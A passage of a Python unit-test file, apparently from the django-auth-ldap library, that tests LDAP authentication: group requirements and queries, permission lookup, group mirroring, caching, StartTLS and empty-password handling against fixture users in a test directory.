self.assertIsNone(user)\n\n def test_no_update_existing(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n ALWAYS_UPDATE_USER=False,\n )\n User.objects.create(username=\"alice\", first_name=\"Alicia\", last_name=\"Astro\")\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertEqual(alice.first_name, \"Alicia\")\n self.assertEqual(alice.last_name, \"Astro\")\n self.assertEqual(bob.first_name, \"Robert\")\n self.assertEqual(bob.last_name, \"Barker\")\n\n def test_require_group(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n REQUIRE_GROUP=\"cn=active_gon,ou=groups,o=test\",\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNotNone(alice)\n self.assertIsNone(bob)\n\n def test_require_group_with_nonexistent_group(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n REQUIRE_GROUP=LDAPGroupQuery(\"cn=nonexistent,ou=groups,o=test\")\n | LDAPGroupQuery(\"cn=active_gon,ou=groups,o=test\"),\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNotNone(alice)\n self.assertIsNone(bob)\n\n def test_no_new_users(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\", NO_NEW_USERS=True\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n # No user was created.\n self.assertIsNone(user)\n self.assertEqual(0, User.objects.count())\n\n def test_simple_group_query(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n query = LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\")\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n self.assertIs(query.resolve(alice.ldap_user), True)\n self.assertEqual(\n [(log.msg, log.args) for log in logs.records],\n [\n (\"Binding as %s\", (\"\",)),\n (\n \"%s is a member of %s\",\n (\n \"uid=alice,ou=people,o=test\",\n \"cn=alice_gon,ou=query_groups,o=test\",\n ),\n ),\n ],\n )\n\n def test_group_query_utf8(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n user = authenticate(username=\"dreßler\", password=\"password\")\n query = LDAPGroupQuery(\"cn=dreßler_gon,ou=query_groups,o=test\")\n self.assertIs(query.resolve(user.ldap_user), True)\n\n def test_negated_group_query(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n query = ~LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\")\n self.assertIs(query.resolve(alice.ldap_user), False)\n\n def test_or_group_query(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n query = LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\") | LDAPGroupQuery(\n \"cn=bob_gon,ou=query_groups,o=test\"\n )\n self.assertIs(query.resolve(alice.ldap_user), True)\n self.assertIs(query.resolve(bob.ldap_user), True)\n\n def test_and_group_query(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n query = LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\") & LDAPGroupQuery(\n \"cn=mutual_gon,ou=query_groups,o=test\"\n )\n self.assertIs(query.resolve(alice.ldap_user), True)\n self.assertIs(query.resolve(bob.ldap_user), False)\n\n def test_nested_group_query(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n query = (\n LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\")\n & LDAPGroupQuery(\"cn=mutual_gon,ou=query_groups,o=test\")\n ) | LDAPGroupQuery(\"cn=bob_gon,ou=query_groups,o=test\")\n self.assertIs(query.resolve(alice.ldap_user), True)\n self.assertIs(query.resolve(bob.ldap_user), True)\n\n def test_require_group_as_group_query(self):\n query = LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\") & LDAPGroupQuery(\n \"cn=mutual_gon,ou=query_groups,o=test\"\n )\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n REQUIRE_GROUP=query,\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNotNone(alice)\n self.assertIsNone(bob)\n\n def test_group_union(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearchUnion(\n LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n ),\n LDAPSearch(\n \"ou=moregroups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n REQUIRE_GROUP=\"cn=other_gon,ou=moregroups,o=test\",\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNone(alice)\n self.assertIsNotNone(bob)\n self.assertEqual(bob.ldap_user.group_names, {\"other_gon\"})\n\n def test_nested_group_union(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearchUnion(\n LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n ),\n LDAPSearch(\n \"ou=moregroups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n ),\n GROUP_TYPE=NestedMemberDNGroupType(member_attr=\"member\"),\n REQUIRE_GROUP=\"cn=other_gon,ou=moregroups,o=test\",\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNone(alice)\n self.assertIsNotNone(bob)\n self.assertEqual(bob.ldap_user.group_names, {\"other_gon\"})\n\n def test_denied_group(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n DENY_GROUP=\"cn=active_gon,ou=groups,o=test\",\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNone(alice)\n self.assertIsNotNone(bob)\n\n def test_group_dns(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n alice.ldap_user.group_dns,\n {\n \"cn=active_gon,ou=groups,o=test\",\n \"cn=staff_gon,ou=groups,o=test\",\n \"cn=superuser_gon,ou=groups,o=test\",\n \"cn=nested_gon,ou=groups,o=test\",\n },\n )\n\n def test_group_names(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n alice.ldap_user.group_names,\n {\"active_gon\", \"staff_gon\", \"superuser_gon\", \"nested_gon\"},\n )\n\n def test_dn_group_membership(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n USER_FLAGS_BY_GROUP={\n \"is_active\": LDAPGroupQuery(\"cn=active_gon,ou=groups,o=test\"),\n \"is_staff\": [\n \"cn=empty_gon,ou=groups,o=test\",\n \"cn=staff_gon,ou=groups,o=test\",\n ],\n \"is_superuser\": \"cn=superuser_gon,ou=groups,o=test\",\n },\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIs(alice.is_active, True)\n self.assertIs(alice.is_staff, True)\n self.assertIs(alice.is_superuser, True)\n self.assertIs(bob.is_active, False)\n self.assertIs(bob.is_staff, False)\n self.assertIs(bob.is_superuser, False)\n\n def test_user_flags_misconfigured(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n USER_FLAGS_BY_GROUP={\n \"is_active\": LDAPGroupQuery(\"cn=active_gon,ou=groups,o=test\"),\n \"is_staff\": [],\n \"is_superuser\": \"cn=superuser_gon,ou=groups,o=test\",\n },\n )\n\n with self.assertRaises(ImproperlyConfigured):\n authenticate(username=\"alice\", password=\"password\")\n\n def test_posix_membership(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=PosixGroupType(),\n USER_FLAGS_BY_GROUP={\n \"is_active\": \"cn=active_px,ou=groups,o=test\",\n \"is_staff\": \"cn=staff_px,ou=groups,o=test\",\n \"is_superuser\": \"cn=superuser_px,ou=groups,o=test\",\n },\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIs(alice.is_active, True)\n self.assertIs(alice.is_staff, True)\n self.assertIs(alice.is_superuser, True)\n self.assertIs(bob.is_active, False)\n self.assertIs(bob.is_staff, False)\n self.assertIs(bob.is_superuser, False)\n\n def test_nested_dn_group_membership(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=NestedMemberDNGroupType(member_attr=\"member\"),\n USER_FLAGS_BY_GROUP={\n \"is_active\": \"cn=parent_gon,ou=groups,o=test\",\n \"is_staff\": \"cn=parent_gon,ou=groups,o=test\",\n },\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIs(alice.is_active, True)\n self.assertIs(alice.is_staff, True)\n self.assertIs(bob.is_active, False)\n self.assertIs(bob.is_staff, False)\n\n def test_posix_missing_attributes(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=PosixGroupType(),\n USER_FLAGS_BY_GROUP={\"is_active\": \"cn=active_px,ou=groups,o=test\"},\n )\n\n nobody = authenticate(username=\"nobody\", password=\"password\")\n\n self.assertIs(nobody.is_active, False)\n\n def test_dn_group_permissions(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"alice\")\n alice = backend.get_user(alice.pk)\n\n self.assertEqual(\n backend.get_group_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertEqual(\n backend.get_all_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertIs(backend.has_perm(alice, \"auth.add_user\"), True)\n self.assertIs(backend.has_module_perms(alice, \"auth\"), True)\n\n def test_group_permissions_ldap_error(self):\n self._init_settings(\n BIND_DN=\"uid=bob,ou=people,o=test\",\n BIND_PASSWORD=\"bogus\",\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"alice\")\n alice = backend.get_user(alice.pk)\n\n self.assertEqual(backend.get_group_permissions(alice), set())\n\n def test_empty_group_permissions(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n bob = User.objects.create(username=\"bob\")\n bob = backend.get_user(bob.pk)\n\n self.assertEqual(backend.get_group_permissions(bob), set())\n self.assertEqual(backend.get_all_permissions(bob), set())\n self.assertIs(backend.has_perm(bob, \"auth.add_user\"), False)\n self.assertIs(backend.has_module_perms(bob, \"auth\"), False)\n\n def test_posix_group_permissions(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=posixGroup)\"\n ),\n GROUP_TYPE=PosixGroupType(),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"alice\")\n alice = backend.get_user(alice.pk)\n\n self.assertEqual(\n backend.get_group_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertEqual(\n backend.get_all_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertIs(backend.has_perm(alice, \"auth.add_user\"), True)\n self.assertIs(backend.has_module_perms(alice, \"auth\"), True)\n\n def test_posix_group_permissions_no_gid(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=posixGroup)\"\n ),\n GROUP_TYPE=PosixGroupType(),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n nonposix = User.objects.create(username=\"nonposix\")\n nonposix = backend.get_user(nonposix.pk)\n\n self.assertEqual(\n backend.get_group_permissions(nonposix),\n {\"auth.add_user\", \"auth.change_user\"},\n )\n self.assertEqual(\n backend.get_all_permissions(nonposix), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertIs(backend.has_perm(nonposix, \"auth.add_user\"), True)\n self.assertIs(backend.has_module_perms(nonposix, \"auth\"), True)\n\n def test_foreign_user_permissions(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"alice\")\n\n self.assertEqual(backend.get_group_permissions(alice), set())\n\n @spy_ldap(\"search_s\")\n def test_group_cache(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n CACHE_TIMEOUT=3600,\n )\n self._init_groups()\n\n backend = get_backend()\n alice_id = User.objects.create(username=\"alice\").pk\n bob_id = User.objects.create(username=\"bob\").pk\n\n # Check permissions twice for each user\n for i in range(2):\n alice = backend.get_user(alice_id)\n self.assertEqual(\n backend.get_group_permissions(alice),\n {\"auth.add_user\", \"auth.change_user\"},\n )\n\n bob = backend.get_user(bob_id)\n self.assertEqual(backend.get_group_permissions(bob), set())\n\n # Should have executed one LDAP search per user\n self.assertEqual(mock.call_count, 2)\n\n def test_group_mirroring(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=posixGroup)\"\n ),\n GROUP_TYPE=PosixGroupType(),\n MIRROR_GROUPS=True,\n )\n\n self.assertEqual(Group.objects.count(), 0)\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(Group.objects.count(), 3)\n self.assertEqual(set(alice.groups.all()), set(Group.objects.all()))\n\n def test_nested_group_mirroring(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n ),\n GROUP_TYPE=NestedMemberDNGroupType(member_attr=\"member\"),\n MIRROR_GROUPS=True,\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n set(Group.objects.all().values_list(\"name\", flat=True)),\n {\n \"active_gon\",\n \"staff_gon\",\n \"superuser_gon\",\n \"nested_gon\",\n \"parent_gon\",\n \"circular_gon\",\n },\n )\n self.assertEqual(set(alice.groups.all()), set(Group.objects.all()))\n\n #\n # When selectively mirroring groups, there are eight scenarios for any\n # given user/group pair:\n #\n # (is-member-in-LDAP, not-member-in-LDAP)\n # x (is-member-in-Django, not-member-in-Django)\n # x (synced, not-synced)\n #\n # The four test cases below take these scenarios four at a time for each of\n # the two settings.\n\n def test_group_mirroring_whitelist_update(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=mirror_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=GroupOfNamesType(),\n MIRROR_GROUPS=[\"mirror1\", \"mirror2\"],\n )\n\n backend = get_backend()\n groups = {}\n for name in (\"mirror{}\".format(i) for i in range(1, 5)):\n groups[name] = Group.objects.create(name=name)\n alice = backend.populate_user(\"alice\")\n alice.groups.set([groups[\"mirror2\"], groups[\"mirror4\"]])\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n set(alice.groups.values_list(\"name\", flat=True)), {\"mirror1\", \"mirror4\"}\n )\n\n def test_group_mirroring_whitelist_noop(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=mirror_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=GroupOfNamesType(),\n MIRROR_GROUPS=[\"mirror1\", \"mirror2\"],\n )\n\n backend = get_backend()\n groups = {}\n for name in (\"mirror{}\".format(i) for i in range(1, 5)):\n groups[name] = Group.objects.create(name=name)\n alice = backend.populate_user(\"alice\")\n alice.groups.set([groups[\"mirror1\"], groups[\"mirror3\"]])\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n set(alice.groups.values_list(\"name\", flat=True)), {\"mirror1\", \"mirror3\"}\n )\n\n def test_group_mirroring_blacklist_update(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=mirror_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=GroupOfNamesType(),\n MIRROR_GROUPS_EXCEPT=[\"mirror1\", \"mirror2\"],\n )\n\n backend = get_backend()\n groups = {}\n for name in (\"mirror{}\".format(i) for i in range(1, 5)):\n groups[name] = Group.objects.create(name=name)\n alice = backend.populate_user(\"alice\")\n alice.groups.set([groups[\"mirror2\"], groups[\"mirror4\"]])\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n set(alice.groups.values_list(\"name\", flat=True)), {\"mirror2\", \"mirror3\"}\n )\n\n def test_group_mirroring_blacklist_noop(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=mirror_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=GroupOfNamesType(),\n MIRROR_GROUPS_EXCEPT=[\"mirror1\", \"mirror2\"],\n )\n\n backend = get_backend()\n groups = {}\n for name in (\"mirror{}\".format(i) for i in range(1, 5)):\n groups[name] = Group.objects.create(name=name)\n alice = backend.populate_user(\"alice\")\n alice.groups.set([groups[\"mirror1\"], groups[\"mirror3\"]])\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n set(alice.groups.values_list(\"name\", flat=True)), {\"mirror1\", \"mirror3\"}\n )\n\n def test_authorize_external_users(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n AUTHORIZE_ALL_USERS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"alice\")\n\n self.assertEqual(\n backend.get_group_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n\n def test_authorize_external_unknown(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n AUTHORIZE_ALL_USERS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"not-in-ldap\")\n\n self.assertEqual(backend.get_group_permissions(alice), set())\n\n def test_create_without_auth(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n backend = get_backend()\n alice = backend.populate_user(\"alice\")\n bob = backend.populate_user(\"bob\")\n\n self.assertIsNotNone(alice)\n self.assertEqual(alice.first_name, \"\")\n self.assertEqual(alice.last_name, \"\")\n self.assertIs(alice.is_active, True)\n self.assertIs(alice.is_staff, False)\n self.assertIs(alice.is_superuser, False)\n self.assertIsNotNone(bob)\n self.assertEqual(bob.first_name, \"\")\n self.assertEqual(bob.last_name, \"\")\n self.assertIs(bob.is_active, True)\n self.assertIs(bob.is_staff, False)\n self.assertIs(bob.is_superuser, False)\n\n def test_populate_without_auth(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n ALWAYS_UPDATE_USER=False,\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=GroupOfNamesType(),\n USER_FLAGS_BY_GROUP={\n \"is_active\": \"cn=active_gon,ou=groups,o=test\",\n \"is_staff\": \"cn=staff_gon,ou=groups,o=test\",\n \"is_superuser\": \"cn=superuser_gon,ou=groups,o=test\",\n },\n )\n\n User.objects.create(username=\"alice\")\n User.objects.create(username=\"bob\")\n\n backend = get_backend()\n alice = backend.populate_user(\"alice\")\n bob = backend.populate_user(\"bob\")\n\n self.assertIsNotNone(alice)\n self.assertEqual(alice.first_name, \"Alice\")\n self.assertEqual(alice.last_name, \"Adams\")\n self.assertIs(alice.is_active, True)\n self.assertIs(alice.is_staff, True)\n self.assertIs(alice.is_superuser, True)\n self.assertIsNotNone(bob)\n self.assertEqual(bob.first_name, \"Robert\")\n self.assertEqual(bob.last_name, \"Barker\")\n self.assertIs(bob.is_active, False)\n self.assertIs(bob.is_staff, False)\n self.assertIs(bob.is_superuser, False)\n\n def test_populate_bogus_user(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n backend = get_backend()\n bogus = backend.populate_user(\"bogus\")\n\n self.assertIsNone(bogus)\n\n @spy_ldap(\"start_tls_s\")\n def test_start_tls_missing(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\", START_TLS=False\n )\n\n authenticate(username=\"alice\", password=\"password\")\n mock.assert_not_called()\n\n @spy_ldap(\"start_tls_s\")\n def test_start_tls(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\", START_TLS=True\n )\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n authenticate(username=\"alice\", password=\"password\")\n mock.assert_called_once()\n log1, log2, log3 = logs.output\n self.assertEqual(\n log1, \"DEBUG:django_auth_ldap:Binding as uid=alice,ou=people,o=test\"\n )\n self.assertEqual(log2, \"DEBUG:django_auth_ldap:Initiating TLS\")\n self.assertTrue(\n log3.startswith(\n \"WARNING:django_auth_ldap:Caught LDAPError while authenticating alice: \"\n )\n )\n\n def test_null_search_results(self):\n \"\"\"\n Make sure we're not phased by referrals.\n \"\"\"\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n authenticate(username=\"alice\", password=\"password\")\n\n def test_union_search(self):\n self._init_settings(\n USER_SEARCH=LDAPSearchUnion(\n LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"),\n LDAPSearch(\"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"),\n )\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNotNone(alice)\n\n @spy_ldap(\"simple_bind_s\")\n def test_deny_empty_password(self, mock):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n alice = authenticate(username=\"alice\", password=\"\")\n\n self.assertIsNone(alice)\n mock.assert_not_called()\n\n self.assertEqual(\n [(log.levelname, log.msg, log.args) for log in logs.records],\n [(\"DEBUG\", \"Rejecting empty password for %s\", (\"alice\",))],\n )\n\n @spy_ldap(\"simple_bind_s\")\n def test_permit_empty_password(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\", PERMIT_EMPTY_PASSWORD=True\n )\n\n alice = authenticate(username=\"alice\", password=\"\")\n\n self.assertIsNone(alice)\n mock.assert_called_once()\n\n 